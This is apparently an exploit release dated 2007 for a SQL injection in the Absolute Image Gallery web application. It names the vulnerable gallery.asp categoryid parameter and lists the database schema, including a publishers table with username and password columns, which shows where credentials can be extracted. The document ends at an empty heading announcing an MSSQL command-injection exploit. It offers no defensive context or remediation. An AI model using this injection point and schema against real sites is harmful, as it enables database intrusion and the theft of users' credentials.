Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit Type : SQL Injection Release Date : {2007-03-15} Product / Vendor : Absolute Image Gallery http://www.xigla.com/absoluteig/ Bug : http://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj- --------------------------------------------------------------------------------------------------------------------------------------------- Script Table/Colon Name : --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : articlefiles fileid filetitle filename articleid filetype filecomment urlfile --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : articles articleid posted lastupdate headline headlinedate startdate enddate source summary articleurl article status autoformat publisherid clicks editor relatedid --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : iArticlesZones articleid zoneid --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : plugins pluginid pplname pplfile ppldescription --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : PPL1reviews reviewid articleid name reviewdate review comments isannonymous --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : publishers publisherid name username password email additional plevel --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : publisherszones publisherid zoneid --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : xlaAIGcategories categoryid catname catdesc supercatid lastupdate catpath images allowupload --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : xlaAIGimages imageid imagename imagedesc imagefile imagedate imagesize totalrating totalreviews hits categoryid status uploadedby additionalinfo embedhtml keywords copyright credit source datecreated email infourl --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : xlaAIGpostcards dateposted postcardid imageid bgcolor bordercolor fonttype fontcolor recipientname recipientemail greeting bgsound sendername senderemail sendermsg --------------------------------------------------------------------------------------------------------------------------------------------- Table Name : zones zonename description template articlespz zonefont fontsize fontcolor showsource showsummary showdates showtn textalign displayhoriz cellcolor targetframe --------------------------------------------------------------------------------------------------------------------------------------------- MSSQL CMD Injection Exploit(For DBO Users) :